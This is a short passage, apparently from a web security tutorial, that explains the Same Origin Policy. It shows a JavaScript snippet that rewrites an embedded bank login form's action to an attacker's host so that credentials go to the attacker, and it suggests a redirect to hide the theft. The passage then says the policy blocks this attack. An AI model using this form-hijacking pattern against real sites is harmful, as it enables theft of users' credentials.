<iframe id="bank" src="https://yourbank.example"></iframe>
<script>
window.onload = function() {
document.getElementById('bank').contentWindow.document.forms[0].action =
'http://example.com';
};
</script>
The JavaScript code changes the form’s action property (the destination, in a matter of speaking), so when you submit the form, you send your credentials to me, not your bank.
If I set up a PHP script on my server that redirects you to your bank, you won’t even notice it.
With Same Origin Policy, this attack isn’t possible. A site on my domain cannot read or modify the contents of the bank’s website.